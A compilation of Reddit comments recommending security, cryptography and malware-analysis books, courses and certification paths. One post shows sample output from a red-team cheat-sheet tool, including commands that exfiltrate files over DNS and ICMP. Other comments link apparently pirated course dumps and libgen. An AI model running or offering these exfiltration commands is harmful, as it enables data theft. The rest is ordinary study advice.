Reddit mentions: The best computer security & encryption books

It looks like you're moreso interested in blue team work. To tell you the truth, I'm more on the offensive side of things, but I'm sure I can still provide some help here. From what I can tell, it seems as though you already have a pretty solid base to work from based on the area you're looking at. Professor Messer provides some high quality videos that would serve as useful to you, as you would need to be pretty well rounded (although not quite expected to master all of these things) to get an infosec position. The network+ and security+ videos may be more useful in this context, but feel free to disregard the topics you know strongly and pursue the ones you're interested in. CompTIA also has the CSA+ which has a heavy focus on analyst concepts. While having certifications aren't a bad thing at all, it's not always necessary if you have the equivalent knowledge (I'd do a few job searches, and build out a "learning syllabus" from there, based on the responsibilities and requirements).

Speaking of which, in your case I would look for related entry level positions. I'm not quite sure where you are in terms of experience via internships / jobs, but assuming you didn't have infosec / IT experience yet, I would look into tier 1 SOC/NOC positions as I would imagine that it would provide the most carryover, considering your skillset and interests.

A few extra resources:

https://www.linkedin.com/pulse/breaking-cybersecurity-field-derek-carlin - Pretty solid career roadmap

https://www.cybrary.it/ - Several free courses, much higher quality than many of the udemy options (Also, don't worry about any of their certifications, they're not of high value compared to the knowledge you gain)

https://www.vulnhub.com/faq/#ptestnext - The most competent defenders that I've known, usually had a basic understanding of the offensive side of things as well. I noticed that you've done some offsec work during your courses, so this would be a good way to cultivate those skills a bit.

https://www.youtube.com/playlist?list=PLtGnc4I6s8dssa8hF4yMTAa4BrSJCSwux - Linux: again, just to show that you're well rounded

https://www.amazon.com/Blue-Team-Field-Manual-BTFM/dp/154101636X - BTFM: A pretty solid usage of 15ish dollars in your situation

Also, almost forgot to mention that the sidebar on here, and /r/netsec has a pretty solid list of resources.

Best of luck, and feel free to message me if you have any more questions, or need clarification on anything.

That is a great list, just a few random comments.

Basics for discrete math, 6.042 is a nice resource, it has a free full open text book. While it's actually simpler than most of your links it actually gives a nice introduction to some of the formalisms you'll run into later.

CLRS is an amazing reference for just about anything you need. It's not a nice introduction to things but it will easily save your behind as a reference in a pinch.

My one real disagreement is your suggestion of abstract algebra book, I'm a fan of Algebra by artin. It's a bit rough, but you can usually pick up older versions fairly cheap and it comes with course notes. It can come with it's ocw counterpart. It's how I learned, and i personally think it's one of the better resources out there.

The more mature version of cousot's class is 6.820 which is a fairly good class but can actually take a while to get through the material if you don't have a friend to do it with. If you get through it, you will have one hell of a base.

For crypto, since i do love crypto probably a bit different, Stanford is a great class I suggest looking at My suggestions, start with

• Technically before Pitfalls by schneier, giving what the hell can go wrong.
  
  
• 6.857 it's got good course notes and will teach you the basics, and some notation. It also goes over the simple groups and osme older algorithms
  
  
  
• Matthew Green's blog is a great place to read about some concepts in simpler terms. It's more protocol based than it is algorithm based, but presents information in a digestible format.
  
  
• Understanding cryptography keeps on this and goes further than 857 does and continues on this journey
  
  
• A bit older but schneiers self study is an interesting set of reads. It gives you papers that help you build up to where to go next, what things will actually occur again and again.
  
  
• A bit more advanced cryptography course It goes further in depth than the stanford course, or 857. It goes further into ZKP than I believe really is needed but goes into some of the other concepts pretty well.
  
  
• This is my off the wall suggestion, Elliptic Curves
  Number Theory and Cryptography is one of the best books I've read on EC yet. It's approachable and actually does an amazing job. If you want checks with it, try the psets here
  
  
  Just a few supplementary suggestions.
  
  You gave a great list, an absolutely a amazing roadmap

Books on project management, software development lifecycle, history of computing/programming, and other books on management/theory. It's hard to read about actual programming if you can't practice it.

Some of my favorites:

• Code: The Hidden Language of Computer Hardware and Software - GREAT choice I notice you already have listed. Possibly one of my favorite, and this should be on everyone's reading list who is involved in IT somehow. It basically how computers and programming evolved and gets you in a great way of thinking.
  
  
• The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography - Another great history book on code and how things came to be. It's more about crypto, but realistically computing's history is deeply rooted into security and crypto and ways to pass hidden messages.
  
  
• Software Project Survival Guide - It's a project management book that specifically explains it in terms of software development.
  
  
• The Art of Intrusion: The Real Stories Behind the Exploits of Hackers, Intruders and Deceivers - A fun collection of short hacking stories compiled and narrated by Kevin Mitnick, one of the most infamous hackers. Actually, any of Mitnick's books are great. Theres a story in there about a guy who was in jail and learned to hack while in there and get all kind of special privileges with his skills.
  
  
• Beautiful Data: The Stories Behind Elegant Data Solutions - Most of the books in the "Beautiful" series are great and insightful. This is one of my more favorite ones.
  
  
• A Guide to the Project Management Body of Knowledge: PMBOK(R) Guide - THE guide to project management from the group that certifies PMP... boring, dry, and great to help you get to sleep. But if you're committed enough, reading it inside and out can help you get a grasp or project management and potentially line you up to get certified (if you can get the sponsors and some experience to sit for the test). This is one of the only real certifications worth a damn, and it actually can be very valuable.
  
  You can't exactly learn to program without doing, but hopefully these books will give you good ideas on the theories and management to give you the best understanding when you get out. They should give you an approach many here don't have to realize that programming is just a tool to get to the end, and you can really know before you even touch any code how to best organize things.
  
  IF you have access to a computer and the internet, look into taking courses on Udacity, Coursera, and EDX. Don't go to or pay for any for-profit technical school no matter how enticing their marketing may tell you you'll be a CEO out of their program.

Alright for hacking... It's a LOTTT of stuff you'll need to learn, everything from hacking wifi, hacking websites, cracking passwords. But really all a hacker is, is someone who knows the system so well they can exploit and break it.

What kind of people are hackers/pen-testers?

Unless your job title is literately "red-teamer, or pentester" then "hackers" are usually security researchers, white hats, security analysts, hobbyists, people who tinker around. But really all hackers are, are computer nerds who love this stuff, this is what we live for. So just don't do anything stupid and don't do anything illegal.

Here is some of the big areas you'll need to learn:

Networking / Network security

Linux / Windows (https://linuxjourney.com is amazing) I learned a ton by creating my own custom Debian based Linux Disro.

Forensics

Cryptography / Stenography

Malware / Malware analysis

System hardening / system security

Privacy techniques (Being safe, Tor, Tails, what you share on social media)

Exploiting services, exploiting machines

Wireless attacks (WEP, WPA, WPA2)

Common vulnerabilities, and exploits

How to use google. (Like dorking, Shodan, using online resources)

Maybe some basic python and scripting

Basic security concepts like NIPS, NIDS, SIEMS, mitigation, security policies.

Common ports and services (You can find flashcards on Quizlet)

https://www.cybrary.it/course/intro-to-infosec

https://www.cybrary.it/course/kali-linux-fundamentals

https://www.cybrary.it/course/ethical-hacking

https://www.cybrary.it/course/comptia-aplus

https://www.cybrary.it/course/comptia-902-2018

https://www.cybrary.it/course/comptia-network-plus

https://www.cybrary.it/course/comptia-security-plus

https://www.cybrary.it/course/comptia-cysa-2018

https://www.udemy.com/pentestplus

https://www.udemy.com/ccna-on-demand-video-boot-camp

https://www.youtube.com/watch?v=wBp0Rb-ZJak (The Complete Linux Course: Beginner to Power User)

Also check out

https://www.youtube.com/user/professormesser

https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q (Hackersploit)

https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w (LiveOverflow)

https://www.youtube.com/playlist?list=PLG49S3nxzAnmpdmX7RoTOyuNJQAb-r-gd (Messer, Networking)

https://www.youtube.com/watch?v=vrh0epPAC5w (Animated full Network+ course)

www.reddit.com/r/netsec

www.reddit.com/r/netsecstudents

www.reddit.com/r/comptia

www.reddit.com/r/linux

150 dumped full courses for free

-https://pastebin.com/j0WVfDif

(my favorites)

http://www.mediafire.com/download/2kczrn29gt6fdp3/Introduction+to+Firewalls.rar

http://www.mediafire.com/download/mnulcdbw817f9q0/Metasploit+Basics.rar

http://www.mediafire.com/download/lhajdkufn9oi5ta/Cisco+CCNA+Security%3B+Firewalls+and+VPNs.rar

http://www.mediafire.com/download/yraijpmuzoa1zpn/Cisco+CCNA+Security%3B+Introduction+to+Network+Security.rar

Practice the skills you learn with CTF'S (Capture the flag)

https://www.hackthebox.eu

https://www.hackthissite.org

http://overthewire.org

https://picoctf.com

https://www.vulnhub.com

http://www.dvwa.co.uk

https://pwnable.tw

Start researching and studying for certifications, COMPTIA, CISCO, REDHAT

https://certification.comptia.org/certifications/security

https://certification.comptia.org/certifications/cybersecurity-analyst

https://certification.comptia.org/certifications/pentest

https://www.cisco.com/c/en/us/training-events/training-certifications/certifications/associate/ccna-routing-switching.html

The intro/easy certs are

Comptia A+ (Hardware, basic computers stuff, cables and stuff)

Comptia Network+ (Networking, network topologies, types, subnetting, vlans, dmz's)

Comptia Security+ (Malware types, threads, attacks, policies)

A bit hard and better certs

Cisco CCNA Cyber ops

Comptia CYSA+ (Security analyst stuff, the security+ but much more in depth)

Comptia Pentest+ (Pentesting tools, methodology, steps, ect.)

eLeanSecurity eJPT (junior pentesting cert)

ecouncil CEH (Good for DoD jobs, kinda outdated tho, hacking stuff)

Now it gets pretty advanced

Comptia CASP+ (advanced methods, concepts, techniques regarding security)

OCSP (Oooh the cool kinds have this one, pentesting galore < msut have)

Comptia CISSP (HR and people love this one, high level cert)

GPEN

GIAC

My recommended pathway is Security+ > Cysa+ > Pentest+ > CEH > CASP+ > OCSP > CISSP

Here is Comptia's recommended pathway .PDF

Start to learn a programming language

Python is highly recommended for people who are looking for a first language because:

It’s easy to learn.

It’s great for scripting.

It can be used for just about anything.

https://www.python.org

https://www.youtube.com/watch?v=rfscVS0vtbw (4 hour nice intro to Python course)

Depending how deep you go you might need to learn C and or Assembly, both are commonly used for malware analysis, reverse engineering, binary exploitation, and exploit development. This also will require you to learn things like GCC, GDB, IDA, Hopper, and all the fun stuff. But this can be really really hard to learn, but is incredibly rewarding.

I can always recommend the Red team Field manual.

https://www.amazon.com/dp/1494295504/ref=cm_sw_r_cp_awdb_t1_2cXvCbPQCA1NC

Some nice cheatsheets I have printed out.

https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

https://blogs.sans.org/pen-testing/files/2013/10/NmapCheatSheetv1.0.pdf

https://www.loggly.com/wp-content/uploads/2015/05/Linux-Cheat-Sheet-Sponsored-By-Loggly.pdf

> I have zero Linux experience. How should I correct this deficiency?

First, install a VM (Oracle OpenBox is free) and download a linux ISO and boot from it. Debian and Ubuntu are two of my favorites. Both are totally free (as are most linux distros). Once installed, start reading some beginner linux tutorials online (or get "Linux In A Nutshell" by O'Reilly).


Just fuck around with it... if you screw something up, blow it away and reinstall (or restore from a previous image)

> Is it necessary? Should I start trying to make Linux my primary OS instead of using windows, or should that come later?

It's not necessary, but will help you learn faster. A lot of security infrastructure runs on Linux and UNIX flavors. It's important to have at least a basic understanding of how a Linux POSIX system works.

> If you can, what are some good books to try to find used or on PDF to learn about cissp and cisa? Should I be going after both? Which should I seek first?

You don't need to worry about taking & passing them until you've been working in the field for at least 3-5 years, but if you can get some used review materials second-hand, it'll give you a rough idea what's out there in the security landscape and what a security professional is expected to know (generally)


CISSP - is more detailed and broader and is good if you're doing security work day-to-day (this is probably what you want)


CISA - is focused on auditing and IT governance and is good if you're an IT Auditor or working in compliance or something (probably not where you're headed)


> What are good books I can use to learn about networking? If you noticed I ask for books a lot its because the only internet I have is when I connect my android to my laptop by pdanet, and service is sketchy at my apartment.

O'Reilly is a reliable publisher of quality tech books. An amazon search for "O'Reilly networking" pull up a bunch. Also, their "in a nutshell" series of books are great reference books for Windows, Linux, Networking, etc... You can probably find older/used copies online for a decent price (check ebay and half.com too)

> How would you recommend learning about encryption? I just subscribed to /r/crypto so I can lurk there. Again, can you point me at some books?

Try "The Code Book" for a very accessible intro to crypto from ancient times thru today
http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323


Also, for basics of computer architecture, read "CODE", which is absolutely excellent and shows how computers work from the ground up in VERY accessible writing.
http://www.amazon.com/Code-Language-Computer-Hardware-Software/dp/0735611319

Okay so there are a couple of good places to start with malware. The first is Malware Analyst's Cookbook. It is a pretty decent beginner level resource.

From there, Practical Malware Analysis is excellent and goes a lot deeper.

For free resources I've heard good things about Dr. Fu's Malware Analysis Tutorials.

You will need to have a strong understanding of reverse engineering. I like Practical Reverse Engineering or Reverse Engineering for Beginners. The latter is free.

With RE comes assembly. I learned from the free book PC Assembly Language. The RE books should have some info on assembly as well.

You should also know the systems programming API and OS internals for whatever OS you're interested in. This is most likely Windows, so I recommend Windows System Programming and Windows Internals. You can find similar books for Linux and macOS too. Having a good understanding of C and C++ is helpful for this. Also get comfortable using your assembly level debugger on your OS of choice. WinDBG, x64dbg, and OllyDBG are all good on Windows. GDB is pretty much the default on Linux, and LLDB on macOS.

I also highly recommend some scripting language, whether it's Python, Ruby, Powershell or whatever for hacking up your own tools.

Lastly, there is a list on GitHub with a ton of helpful links.

I think that's enough for now.

As far as demand it's hard to say and probably depends a lot on where you're from. It's certainly not like the demand for webdevs but there's also not nearly as many people with the skillset. I'm not a malware analyst myself, I'm more focused on security research and embedded development.

I know those skills are especially high in demand around the Washington, DC area with defense contractors and government agencies. Especially if you can get a security clearance. Most other security firms I know of are always looking for good people with strong reversing and OS internals knowledge.

Let me know if you have any questions and I will try to answer.

Sure thing! I don't do a whole lot of Malware RE, but where I started was with the book:

• Practical Malware Analysis - It gives a good start to understanding how to work on dissecting Malware and gives a nice set of hands on practice.
  
  Of course, knowing assembly is very valuable for Malware Analysis as well, so it would be useful to still know most, if not all, of the stuff I listed in the other comment.
  
  Other good places to start would be:
  
  
• RPISEC - Intro to Malware
  
• Malware Unicorn RE 101
  
• Malware Unicorn RE 102
  
• Some Recommended Tools/Books
  
• Malware Analyst's Cookbook
  
• MalwareBytes Encryption 101
  
• This Random list of 'Awesome Malware stuff'
  
  Definitely would start with the book, Practical Malware Analysis and get your feet wet a little bit. Then browse through the other stuff or if you're a visual person, watch some videos on youtube of how other people dissect Malware, just so you can see the bigger picture.
  
  Hope that helps!

I'd like to preface this by saying that I am certainly not the world's greatest security expert and that there are many people who are more qualified to speak to this matter. Hopefully some of them will see your post and chime in.

In my experience the less complex the product is, the easier it is to both maintain and secure. Therefore, knowing what you're building and how to build it gives you much better control over the security of it. Unless you're apart of an extremely tight-knit team that includes your SysOps and DevOps people or you're developing the product and the product's host environment by yourself, then there will always be aspects of security outside of your control. However, putting time and effort into the security of the product itself is typically a rewarding investment.

Books:

• Threat Modeling: Designing for Security by Adam Shostack
  This book is focused on introducing security considerations into the phases of the SDLC. The information in this book is a bit more advanced than Security Software (included below) but not inaccessible to a beginner. Understanding architectural risk analysis is a valuable skill in any tech environment.
  
• Iron-Clas Java: Building Secure Web Applications by Jim Manico & August Detlefsen
  I would say this book is a must-have if you develop any sort of Java web app or API. The authors manage to cover a lot of territory in a very understandable format.
  
• Software Security: Building Security In by Gary McGraw
  Another book that is primarily aimed at introducing security into each phase of the SDLC. When I first started working in software development I found it extremely helpful at convincing some "old guard" types why red teaming products is extremely valuable. You may want to read this before reading Threat Modeling.
  
• The Practice of Network Security Monitoring: Understanding Incident Detection and Response by Richard Bejtlich
  Networking is definitely not my strongest skill but this book breaks down some concepts of network monitoring and threat detection in ways that are easy to understand.

Copy paste from a post I made earlier

Malware RE isn't really all that much voodoo as it seems, you take the executable and break it down into steps.

First check out the PE headers and find what strings you can, characteristics. Figure out if the malware is packed or not.

A quick and dirty way to get an idea of what it does it run it with certain tools on the system and a linux box to intercept all network communications. This is called behavioral analysis.

After that you can load it into a disassembler like IDA Pro and start looking for interesting functions or windows API calls. Things like WriteFile, VirtualAllocEx, ReadFile then figure out that they are doing.

After that you can take it into your debugger (I like OllyDbg) and set some breakpoints at interesting functions to see what the malware is doing in the stack. Like I said, its not voodoo once you look into it further.

Creating the malware is a whole different story and outside my skill set. In fact I hate programming and know only high level programming, basically I can interpret code and what it wants to do. But I have an easier time reading Assembly (lol) than something like C++. But coding malware is just like coding anything else, design it for what you want it to do and get to work. Stuff like Stuxnet had probably at a minimum 10 extremely talented coders behind it.

Here is a great list of learning sources.

Cybrary.it Malware Analysis Course - Free

Opensource Malware Analysis Course - Free

Dr. Fu's Malware Analysis Course - Free

OpenSecurityTraining.info - Free

SANS FOR610 Reverse Engineering and Malware Analysis - Expensive

Practical Malware Analysis

Practical Reverse Engineering

Malware Analyst's Cookbook

Aloha everyone, I would like to introduce a little tool i've been working on : rtfm.py

https://github.com/leostat/rtfm | https://necurity.co.uk/osprog/2017-02-27-RTFM-Pythonized/

The program aims to give you a database of helpful commands, references, cheatsheets and tips in an indexed, easy to search format.

You can search through the database using one or more of; The command, tags, URL's, references, author, date added, or, Comments to get the information you need. At the moment it has around 500 commands in it, and it comes with an updater to allow me to push more content to it from github.

At the moment its not perfect, with the code probably being a tad into the horrendous category, but it works! As a quick example, you may be on a box and wanting to exfil some data, for some odd reason you don't have internet access, but rtfm to the rescue!

12:10:root:rtfm: ./rtfm.py -R exfil
++++++++++++++++++++++++++++++
Command ID : 384
Command : for line in base64 -w 62 [file]; do host $line.[hostname]; done

Comment : exfil file through DNS, may want to encrypt, also assuming you have a short domain
Tags : linux,bash,loop,interesting
Date Added : 2017-06-18
Added By : Innes
References
__
https://www.amazon.co.uk/Rtfm-Red-Team-Field-Manual/dp/1494295504
++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++
Command ID : 386
Command : ping -p 11010101010101010101010101010199 -c 1 -M do 127.0.0.1 -s 32; for line in base64 sslfile.key | xxd -p -c 14; do line2=echo "11 $line 99" |tr -d ' '; ping -p $line2 -c 1 -M do 127.0.0.1 -s 32; done; ping -p 11101010101010101010101010101099 -c 1 -M do 127.0.0.1 -s 32

Comment : Exfil over icmp
Tags : linux,networking,loop,interesting
Date Added : 2017-06-18
Added By : Innes
References
__
https://www.amazon.co.uk/Rtfm-Red-Team-Field-Manual/dp/1494295504
++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++
Command ID : 496
Command : for line in $(tshark -r [pcap] -T fields -e data | uniq | grep -v "......................................................" | sed s/.11/11/g | grep "11.99" | sed s/11// | sed s/99$// | tr -d '\n' | sed s/0101010101010101010101010101/'\n'/g |sed s/010101010101010101010101010//g); do echo $line | xxd -r -p | base64 -d;echo +++++++++++++++++++; done

Comment : Convert exfil ICMP back to files from pcap
Tags : linux,networking,loop
Date Added : 2017-06-18
Added By : Innes
References
__
https://ask.wireshark.org/questions/15374/dump-raw-packet-data-field-only
++++++++++++++++++++++++++++++

Throughout the program I have tried to include references to where the commands have come from, however this has not always been possible. If you spot a missing reference or nod, please let me know and I will add it in!

There are a few bugs in the code i'm aware of, and a couple of things I need to add still but let me know what you think! If you like it, awesome, if you don't then boo. Have a look, and let me know what you think with any suggestions, or if your feeling nice, submit content for the database / suggestions or code to improve the program.

Have a great day all!

Both are wanted m8! Seriously there is no shortage for Cyber Security Professionals, there are too many jobs, and too little people to fill them!

Red Team is a little harder to break into then Blue Team is, due to the wide range of knowledge you need. Red Team is more offensive, so you will be hacking companies (legally) and testing for vulnerabilities, misconfigurations, etc.

Blue Team is more defensive, so you will be working for a company internally - basically preventing cyber attacks, setting up firewalls, managing IDS/IPS, tracking malware, working with SIRT on breaches, doing DFIR and Data Recover, etc.

Since you said you want to break into Red team, then I highly suggest you start with the Security+ (as I posted above) so you can get the basics down.

At the same time start listening to podcasts like Paul's Security Weekly, Down the Security Rabbit Hole, etc. As well as start reading blogs on hacking to get a feel for whats done, get a grasp at security terminology, and just recent news overall.

Get a home lab and learn a few tools like Wireshark and Nmap for basic Cyber Security work - to learn how packets work, how they are structured, and how to scan pc's for ports and services. At the same time, focus on learning about threats and vulnerabilities (which are covered in security+).

If you want to get into PenTesting then you need a wide range of knowledge. Pick up and learn a few languages (master the basics and understand what the code does and how to read/interpret it). You need to know: PHP, HTML, SQL, Python (or Ruby), and a basic language like C, or Java (but this is for more advanced topics like buffer overflows and all)

If you want to dig deeper into PenTesting then start reading: https://www.offensive-security.com/metasploit-unleashed/

The above is a good way to get into the Kali Distro and learn how to run Metasploit against vulnerable VM's.

Take a look at https://www.vulnhub.com/resources/ for books, and vulnerable VM's to practice on.

https://www.cybrary.it/ is also a good place with tons of videos on Ethical Hacking, Post Exploitation, Python for Security, Metasploit, etc.

Pick up some books such as

The Hacker Playbook 2: Practical Guide To Penetration Testing

Hacking: The Art of Exploitation

Black Hat Python: Python Programming for Hackers and Pentesters

Rtfm: Red Team Field Manual

The Hackers Playbook is great resources to get you started and take you step by step on pen testing that will allow you to alter explore the endless possibilities. The Art of Exploitation is also very good, but it's more for exploit writing and buffer overflows (much more advanced topic to save for later!)

Also a good list of resources that you can learn more about security:

Getting Started in Information Security

Pentester Labs

Awesome InfoSec

Awesome Pentest

Two of my all time favorite math subjects: Linear Algebra and Number Theory.

My Number Theory professor actually wrote a textbook that I think you’d find is, generally speaking, pretty easy to follow and has some neat applications. Bear in mind though that he wrote it specifically to teach Number Theory at a University level so sometimes reading through some proofs may not be exactly clear. here is the libgen link, if you’d rather another source this is the amazon link to purchase or rent the book.

You will learn some cool techniques and patterns and things you (possibly) never even knew about numbers if you start studying Number Theory.

Now my linear algebra textbook I never actually used because my professor never required it but from what I hear it’s a good foundation but doesn’t expound much upon certain topics - idk if that’s true but I heard the author is a chill dude so here ya go

You can libgen that too.

I don’t exactly think studying calculus on your own will be too exciting, but if you do study calculus, you can then carry it over to other fields - like physics, which has a foundation in calculus from Isaac Newton. I don’t have a good reading source for introductory calculus.

Don't bother with setting up things to try and attack. You will be on blue team and your job is defense. It's better to find someone to attack your VMs instead of trying it yourself.

A good starting point is just learning what the normal list of services look like on Windows and Linux boxes. Process monitor is a great tool for Windows to practice with.

Have a good understanding how ports work and how to lock them down. Be aware of the most common ports that are exploited, and how they're exploited. Don't let anything talk to other boxes that they don't need too.

Knowing firewalls is your best friend and will be the biggest factor in keeping your network safe. They usually use Juniper and Palo Alto firewalls.

Disable things like CMD and Powershell if you don't know how to use them efficiently yourself, because they will be used against you. It's better to get rid of it if you can't use it.

Avoid using the internet on the VM boxes because your connection can be intercepted and exploited. You are usually given outdated operating systems so be familiar with common exploits from yesteryears.

The blue team field manual is a great resource. It won't teach you anything but it's a very good reference point, and you can use that to dig deeper in other sources.

Honestly, you don't need to be a network security major to do well at these competitions. The red team isn't going to break everything to the point where it isn't usable or easily fixable until the very end of the competition. If you at least have some computer systems background you should be fine. Understand Windows/Linux, Active Directory, SQL, and Firewalls.

https://www.amazon.com/Blue-Team-Field-Manual-BTFM-ebook/dp/B077WF4WYV

***I'm a student still learning networking AND Security, butThis book may help you get in the right direction. It's a very good book, but it's pretty basic, however. In otherwords, it's for people (like me) who need things said plainly in people terms. I read this book and passed Security+ no problem. Having a good understanding of networking and how it actually works is a good start to security, and knowledge of ports is HUGE. Best of luck, and a little advice from a former thread I read:
"Don't learn to hack, hack to learn"

Malware Analysis and Pentesting are 2 somewhat different fields of practice, though they do have overlapping education and tactics.

For Pentesting I can't point you to a better framework than Vuln. Assesments. That will give you the step by step methodology to a pentest with listing of the tools you can use for each step. As I said towards the end of my initial post, I am not a huge fan of what most people call "pentesting" these days as it's turned into basically automated vulnerability scanning (Nessus, OpenVAS, etc) and then the use of canned exploits through Metasploit and similar toolsets. I just don't understand the appeal of that myself and because of that I can't really answer this question very thoroughly (though there are plenty here who can).

Now Malware Analysis is something I can talk about; it is where most of my fascination and passion resides. I would follow the "curriculum" I laid out above since most of that pertains to Reverse Engineering which is the crux of Malware Analysis. The only change I would make is to learn Assembly right after C and then after you're comfortable with C, write a few of your own programs and disassemble them yourself in conjuction with learning Assembly through this course which I already linked above in my original "curriculum" post. It wouldn;t hurt to also use this page to guide you as well.

As far as books specific to Malware Analysis, the standard seems to be Practical Malware Analysis and Malware Analyst Cookbook. Both of those are great books, the former has some fun labs for both beginners and advanced analysts to gain knowledge from. However, with that being said, malware is such a dynamic landscape, the constantly growing and unstable nature of this type of work means you have to be up to date at all times. The malware authors and threat actors are becoming more and more effective and creative, not to mention those which are well funded and persistent know usually as the dreaded "APT", adapt new TTP's daily and the methods used to evade our disassembling, escape VM's, cover up tracks, divert your attention, etc, etc.

Anyone interested in this topic should read the codebook. As I remember the polish were the first to crack it, but after improvements of the enigma system they didn't have the resources to crack it anymore. The British built upon the polish success and threw lots of money and talent at it such that they could crack all oncoming versions - with the exception of the German navy that used the best version of Enigma (and had better practices in place).

The Code Book by Simon Singh has a nice section on the Enigma machine and at least some of how it was cracked. It's a little simplified but not significantly*. I took a course years ago that went really in depth on cracking Enigma by hand, and it used Singh's book as the main textbook for that part with a lot of additional handouts that I don't have any more.

• The really important point, mathematically, is that conjugate permutations -- σ and ρ are conjugate if σ = π^(-1)ρπ for some permutation π -- have the same cycle structure (find a good Group Theory book if you don't know about cycle structures).
  
  
• Because the Enigma operates by sending a signal through some wires (permuting as π), then through a reflector (ρ), then backwards through the same wires (now permuting as π^(-1)), large parts of that scrambling have no effect on the cycle structure.
  
  
• If you can determine the cycle structure of the overall encryption, then you can narrow it down from millions or thousands of possible settings to only hundreds or even dozens depending on the particular cycle structure. Then you can actually make progress by hand.
  
  * Different branches of the gov't and military had different Enigmas, and some really were more complicated and way harder to crack. The "standard" army one is basically like Singh describes, although he assumes that the inner wirings of the rotors are known. In fact Rejewski had to figure that out too, and though that also used cycle structures, it's much more technical.

>But basically after that I have to decide soon whether or not to focus on a Cisco, or Microsoft track at my college.

Sounds like your "college" is a joke. You should be learning the fundamentals that are responsible for the underpinnings of these technologies, not vendor recommendations that can easily almost be called propaganda. Especially at your beginner level, you wouldn't even touch technologies as part of your responsibility at the level taught by an MCSE or CCNA unless you work for an absolute moron.

The world is larger than Cisco and Microsoft. I suggest you look for actual academic books on Networking and Server Architecture to learn more useful things.

Computer Networking: A Top-Down Approach (6th Edition) https://www.amazon.com/dp/0132856204/ref=cm_sw_r_cp_awd_4Ev3wbE0EVGDH

Understanding and Deploying LDAP Directory Services, 2nd Edition https://www.amazon.com/dp/0672323168/ref=cm_sw_r_cp_awd_KFv3wbW3QNAGF

For future tracks:

Databases:

SQL Queries for Mere Mortals: A Hands-On Guide to Data Manipulation in SQL (3rd Edition) https://www.amazon.com/dp/0321992474/ref=cm_sw_r_cp_awd_SGv3wbGCZ24FA

Fundamentals of Database Systems (7th Edition) https://www.amazon.com/dp/0133970779/ref=cm_sw_r_cp_awd_qHv3wb1YC95NS

Security:

Computer Security: Principles and Practice (3rd Edition) https://www.amazon.com/dp/0133773922/ref=cm_sw_r_cp_awd_ZHv3wb7J1YJKC

Blue Team Handbook: Incident Response Edition: A condensed field guide for the Cyber Security Incident Responder. https://www.amazon.com/dp/1500734756/ref=cm_sw_r_cp_awd_uIv3wbK1361D2

Hardware:

Upgrading and Repairing PCs (22nd Edition) https://www.amazon.com/dp/0789756102/ref=cm_sw_r_cp_awd_gJv3wbCKGA502

Problem Solving:

The Thinker's Toolkit: 14 Powerful Techniques for Problem Solving https://www.amazon.com/dp/0812928083/ref=cm_sw_r_cp_awd_XKv3wbKQFJK6Q

Best of luck. I recommend learning Shell languages and the basics of shell navigation and data manipulation techniques for various operating systems as well.

Thanks, spit334. I'd like to take the opportunity to recommend Simon Singh's The Code Book. Fascinating, and a great read. I have lent my copy to many friends over the years and it never fails to enthrall.

The beginning of this video has a good explanation of how public/private key cryptography works, using the analogy of paint colors to show how one way functions make encryption like this possible. The math part is a little rushed, but the first half is a great visual aide.

I recommend reading The Code Book by Simon Singh if you're interested in the history of cryptography in general. The sections on the Enigma machine are fascinating.

Simon Singh explains.

edit: Hey, I didn't expect this to become the top comment. Neat. Might as well abuse it, by providing bonus material:

This is the same Simon Singh discussed in this recent and popular Reddit post; he is a superhero of science popularization. He has written some excellent and highly rated books:

• Big Bang: The Origin of the Universe
  
• The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography
  
• Fermat's Enigma: The Epic Quest to Solve the World's Greatest Mathematical Problem
  
• Trick or Treatment: The Undeniable Facts about Alternative Medicine
  
  (full disclosure: I have nothing to disclose, other than that I'm a fan of his work.)

Yes, most Gov jobs require at least Sec+.

Depending on how much you did as an LEO you may look into computer forensics. Network Security etc. You may also want to beef up knowledge of networking as well. So either the Net+ and/or CCNE cert.

Books are always a good place to start. I don't know about this one but have read a few other books by this publisher that have been pretty good.

Ones I have read/skimmed:

• Social Enginnering Penetration Testing
  
• The Basics of Inormation Security: Understanding the Fundamentals of InfoSec in theory and Practice
  
• The Basics of Hacking and Penetration Testing
  
  
  Haven't picked this one up myself, but it has good reviews
  
  
• RTFM: Red Team Field Manual
  
• The Hacker Playbook
  
  
  

RSA and public key cryptography in general are fascinating ideas, and do have tremendous applications to "real life". For an extremely approachable/readable book about cryptography I highly recommend Simon Singh's "The Code Book". It doesn't delve very deep into the technical mathematics of cryptography, but it does do a great job of understanding the basic evolution of codes. ciphers, and cryptography. I wrote my high school IB extended essay on the history of RSA and public key cryptography, and this book was a great source. Again, you would probably get better recommendations for topics if you specified your current grade/level.

There are a ton of different things you can do on the defensive side. The path here is a bit less defined because you can specialize in each of these areas with out ever really touching the other ones. But I think these are the most important skills as a defender, so I’ll break it up into three smaller chunks. For the most part, defender/Blue-team concepts draw from these skills, I’ve setup the courses in order, as some of these skills may feed into other areas.


IR:

• Computer Forensics and IR - This is the hole grail of IR. Written by the best in the business, a great start to the world of IR and Forensics
  
  
• Network Analysis. SOC-based 1-day course (Includes slides and labs)
  
  
• Hacking Techniques and Intrusion Detection - 5-6 day course
  
  
• PCAP analysis and Network Hunting - 2 day course
  
  
• Blue Team Field Manual
  
  
  Forensics:
  
  
• Network Forensics - 2 day course
  
  
• File System Forensics
  
  
• Windows 8 Forensics
  
  
• Registry Forensics
  
  
• Memory Forensics
  
  
• 13 Cubed Youtube Series
  
  
• Advanced Network Forensics - SANS ( meaning If you can get someone else to pay for it, SANS courses are expensive)
  
  
• Overall Cheatsheet/Forensics knowledge dump
  
  
• Now, you’re ready for the CHFI Certification
  
  Reverse Engineering (Dynamic and Static):
  
  
• Practical Malware Analysis
  
  
• Malware Unicorn (Awesome RE, has an awesome blog and some good intro training)
  
  
• Malware Analyst’s cookbook
  
  
• IDA Pro Book
  
  
• Intro to Reverse Engineering - 2 day course
  
  
• Malware Dynamic Analysis - 3 day course
  
  
• SANS*** GREM Certification
  
